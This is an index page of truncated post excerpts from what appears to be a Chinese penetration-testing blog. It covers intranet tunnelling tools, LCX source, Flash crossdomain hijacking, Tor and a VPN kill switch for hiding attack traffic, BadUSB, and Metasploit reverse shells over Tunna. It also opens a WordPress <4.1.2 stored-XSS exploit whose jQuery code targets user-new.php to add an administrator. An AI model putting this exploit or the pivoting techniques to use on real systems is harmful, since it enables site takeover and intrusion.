内网边界工具存档

Mocks  http://sourceforge.net/projects/mocks/ Ssocks http://sourceforge.net/projects/ssocks/ Htran  http://download.csdn.net/detail/bjm123/8470401 rcsocks  https://github.com/darkk/redsocks reDuh https://github.com/sensepost/reDuh reGeorg  https://github.com/sensep...

阅读全文>>

Lcx for Linux - Source Code

找个几个LCX源码编译都报错,这里存个档 #include <sys/time.h> #include <signal.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <string.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <stdio.h...

阅读全文>>

Music List for Self Version 1.0 beta

地址:http://music.jeary.org 上图: html5和Jquery丰富的web时代,很轻松的就能制作出一个效果不错的web播放器 MP3文件目前是来自虾米,通过直链转换接口,研究了一下,转换直链有两种办法: 1.通过php脚本或python脚本进行抓取然后返回MP3文件 流程如下: http://test.com/xiami.php?id=123456  >>  抓取  >>  伪静态...

阅读全文>>

QQWry.dat IP数据库导入进Sql Server

先上张图: 数据来自纯真IP数据库,但是由于纯真数据库的查询工具不是很灵活,比如我只想取某一个地区的IP来进行扫描,虽然它有查询功能,可是查询出来的数据要进行二次整理才能放进nmap扫描,所以我还是决定导入进数据库,这样不管日后写工具需要提取,还是想直接按条件提取IP都较为方便、灵活 回车即开始连接数据库进行导入操作 QQWry.dat&转换工具下载链接 至于最后可以用来干嘛,请自行发挥想象.

阅读全文>>

Flash跨域劫持用户操作

漏洞利用一: 目标站点crossdomain文件配置星号,例如 http://news.sohu.com/crossdomain.xml 那么就可以利用flash在任意域向目标发送请求并得到结果,发送请求的时候是带上cookie的,所以就达到了劫持的效果。 PS:这个搜狐的新闻站并没有什么敏感操作,所以跨域请求并没有意义,只能获取一下它的html源码,这里只是举例 这个POC源码在git上,链接:https://github.com/nccgroup/CrossSiteContentHij...

阅读全文>>

Wordpress < 4.1.2 存储型XSS EXP

ph发了一个wp的xss的poc,然有人问我要exp.. 其实Jin神早就在zone里发过了,这里直接稍微改改引用就能成功执行添加管理员或getshell 代码如下:(转载请注明原创0x_Jin) 1.添加管理员 var a = location.href.split('/'); var xurl = location.href.replace(a[a.length-1],"user-new.php"); jQuery.ajax({   url: xurl,   type: 'GET',   dat...

阅读全文>>

Tor 隐身大法.

当我们接入网络的时候,无时不刻真实地址都在被追踪或记录着.如果进行带有恶意的访问、检测,可能就会被逆向定位出发起请求的人。 某些场景,我们只需要一个vpn即可,但是你会在vpn的官网或软件上看到类似这样的提示: 不管我们连接VPN是否进行违法活动,它这个公告的意思已经表明我们在进行网络连接的时候,所有流量都会被一一记录,如果你和我一样不喜欢这种感觉,Let‘s start. 详情链接:http://drops.wooyun.org/tips/1226 Tor介绍&说明 Tor 是一...

阅读全文>>

Badusb初玩步骤记录&疑问探讨

一直在各大常逛的网站看到关于Badusb的文章,顿时觉得很神奇,很高端,于是一直想拥有这么一个邪恶的东西,可是因为2303不是很好找,并且git上的编译写入过程一看就头大,所以一直搁浅了,可是并没放弃,扯远了,扯回来。 (刚才发文章,显示操作异常,所以本来很详细的文,现在简短点写吧) PS:英文好的同学可以直接去Git看官方教程 PS:发现关于Badusb的详细教程文章国内寥寥无几,大牛们肯定都是在躲着玩..让后来想学的小白怎么办 需要的环境&工具 0.2303芯片的U盘  (废话...) 1.Visual Stu...

阅读全文>>

Tunna & Msf反弹shell

在内网渗透的某些情况下,数据只进不出,但是目标Http数据必须得出来吧.. 之前一篇文章提到用Tunna进行转发内网的数据(Tunna内网转发) 提到过,它同样能结合Msf反弹meterpreter.Let's Start. 1.首先使用Msf生成一个payload绑定在12345端口 2.上传到网站目录&增加执行权限&执行     ①.上传生成的payload到tmp目录     ②.chmod +x /tmp/bi...

阅读全文>>

网卡状态发生变化自动断网小工具

在我们VPN断开的时候,不想让真实IP发送数据包出去(你懂的.) 于是有了此工具 说明:连上VPN之后,点开始检测,会自动循环判断当前网卡状态,如发生改变则立即禁用网卡 注意:重新启用网卡之前,请确保没有程序在发送数据包,否则重新启用网卡后还是真实IP发送的数据包 链接: http://pan.baidu.com/s/1dD4cKLV 密码: 35wu

阅读全文>>